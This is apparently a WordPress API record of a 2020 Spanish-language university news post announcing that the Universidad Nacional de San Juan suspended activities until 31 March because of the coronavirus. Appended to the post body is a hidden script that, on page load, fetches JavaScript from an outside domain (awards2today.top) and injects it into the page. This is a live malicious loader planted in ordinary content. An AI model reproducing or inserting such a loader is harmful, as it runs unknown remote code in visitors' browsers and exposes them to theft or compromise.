{"id":394,"date":"2020-03-16T17:26:52","date_gmt":"2020-03-16T20:26:52","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=394"},"modified":"2025-06-21T12:05:58","modified_gmt":"2025-06-21T15:05:58","slug":"la-unsj-suspendio-todas-las-actividades-hasta-el-31-de-marzo","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/03\/16\/la-unsj-suspendio-todas-las-actividades-hasta-el-31-de-marzo\/","title":{"rendered":"LA UNSJ SUSPENDI\u00d3 TODAS LAS ACTIVIDADES HASTA EL 31 DE MARZO"},"content":{"rendered":"\n<p>Es en adhesi\u00f3n a lo dispuesto por autoridades nacionales de Educaci\u00f3n y como modo de prevenci\u00f3n.<\/p>\n\n\n\n<p><strong>El rector de la UNSJ, Oscar Nasisi, inform\u00f3 hoy que la Universidad Nacional de San Juan suspende todas las actividades hasta el 31 de marzo, en adhesi\u00f3n a las medidas sanitarias dispuestas por la autoridad educativa nacional, en el marco de la pandemia por coronavirus.<\/strong><\/p>\n\n\n\n<p>La medida abarca actividades acad\u00e9micas, administrativas, deportivas, etc.&nbsp;<\/p>\n\n\n\n<p>Como se recordar\u00e1, el Consejo Superior de la UNSJ se hab\u00eda declarado en sesi\u00f3n permanente el jueves 12 de marzo. Para entonces, ya se hab\u00edan adoptado medidas preventivas, como retirar de la atenci\u00f3n al p\u00fablico a personas de m\u00e1s de 65 a\u00f1os, intensificar las medidas de limpieza y suspender todos los actos de car\u00e1cter p\u00fablico.<\/p>\n\n\n\n<p>Es por ello que tambi\u00e9n se dispuso licenciar a embarazadas, personal con inmunosupresi\u00f3n y mayores de 65 a\u00f1os.<\/p>\n\n\n\n<p><strong>M\u00e1s actividades suspendidas:&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Mesas de examen en las cinco facultades y Escuela de Ciencias de la Salud correspondientes al lunes 16&nbsp;de marzo<\/li><li>El Comedor Universitario funcionar\u00e1 en los horarios normales. Se deber\u00e1 concurrir con un recipiente para retirar su vianda y volver a sus domicilios.&nbsp;<\/li><li>Actividades deportivas en el Complejo Deportivo \u201cEl Palomar\u201d<\/li><li>Talleres del \u00c1rea de Cultura de la Secretar\u00eda de Extensi\u00f3n Universitaria<\/li><\/ul>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Es en adhesi\u00f3n a lo dispuesto por autoridades nacionales de Educaci\u00f3n y como modo de prevenci\u00f3n. El rector de la UNSJ, Oscar Nasisi, inform\u00f3 hoy que la Universidad Nacional de San Juan suspende todas las actividades hasta el 31 de marzo, en adhesi\u00f3n a las medidas sanitarias dispuestas por la autoridad educativa nacional, en el<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/03\/16\/la-unsj-suspendio-todas-las-actividades-hasta-el-31-de-marzo\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,16,9,7,8],"tags":[],"class_list":["post-394","post","type-post","status-publish","format-standard","hentry","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud","category-vida-universitaria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/394","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=394"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/394\/revisions"}],"predecessor-version":[{"id":860,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/394\/revisions\/860"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=394"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=394"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=394"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}